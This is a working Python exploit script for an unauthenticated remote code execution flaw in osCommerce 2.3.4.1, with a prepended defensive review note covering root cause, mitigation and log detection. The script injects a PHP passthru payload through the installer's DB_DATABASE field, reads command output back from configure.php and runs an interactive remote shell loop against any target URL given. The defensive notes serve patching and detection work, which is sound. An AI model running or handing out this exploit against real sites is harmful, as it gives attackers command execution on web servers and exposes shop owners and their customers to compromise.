# Review note (defensive reading of this listing):
#   The whole script arrived collapsed onto two physical lines; the code is left
#   byte-identical below and only these notes are added.
#   Root cause described by the header: the osCommerce /install directory was
#   left in place after setup, so the unauthenticated installer finish step
#   (install.php?step=4) still accepts form fields and writes them into
#   install/includes/configure.php. Because that value lands inside PHP source,
#   unescaped input in DB_DATABASE becomes executable code — a configuration
#   file injection, the same class of bug as any generator that interpolates
#   user input into code without escaping.
#   Mitigation: delete the /install directory once installation is complete
#   (the vendor's own post-install step), keep includes/configure.php
#   non-writable by the web server user, and deny web access to the installer
#   path at the HTTP server so a forgotten copy is not reachable.
#   Detection: in web-server logs, a POST to /install/install.php with step=4
#   on an already-installed site, followed by a GET of
#   /install/includes/configure.php, is the sequence the script below performs;
#   an existing site should never see either request after deployment.
#   Indicators on disk: configure.php whose DB_DATABASE line no longer holds a
#   plain database name, or any file-modification time on it after go-live.
# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2) # Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin # Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php # Notes: The RCE doesn't need to be authenticated # Date: 26/06/2021 # Exploit Author: Bryan Leong # Vendor Homepage: https://www.oscommerce.com/ # Version: osCommerce 2.3.4 # Tested on: Windows import requests import sys if(len(sys.argv) != 2): print("please specify the osCommerce url") print("format: python3 osCommerce2_3_4RCE.py ") print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog") sys.exit(0) baseUrl = sys.argv[1] testVulnUrl = baseUrl + '/install/install.php' def rce(command): #targeting the finish step which is step 4 targetUrl = baseUrl + '/install/install.php?step=4' payload = "');" payload += "passthru('" + command + "');" # injecting system command here payload += "/*" #injecting parameter data = { 'DIR_FS_DOCUMENT_ROOT': './', 'DB_DATABASE' : payload } response = requests.post(targetUrl, data=data) if(response.status_code == 200): #print('[*] Successfully injected payload to config file') readCMDUrl = baseUrl + '/install/includes/configure.php' cmd = requests.get(readCMDUrl) commandRsl = cmd.text.split('\n') if(cmd.status_code == 200): #print('[*] System Command Execution Completed') #removing the error message above for i in range(2, len(commandRsl)): print(commandRsl[i]) else: return '[!] Configure.php not found' else: return '[!] 
Fail to inject payload' #testing vulnerability accessing the directory test = requests.get(testVulnUrl) #checking the install directory still exist or able to access or not if(test.status_code == 200): print('[*] Install directory still available, the host likely vulnerable to the exploit.') #testing system command injection print('[*] Testing injecting system command to test vulnerability') cmd = 'whoami' print('User: ', end='') err = rce(cmd) if(err != None): print(err) sys.exit(0) while(True): cmd = input('RCE_SHELL$ ') err = rce(cmd) if(err != None): print(err) sys.exit(0) else: print('[!] Install directory not found, the host is not vulnerable') sys.exit(0)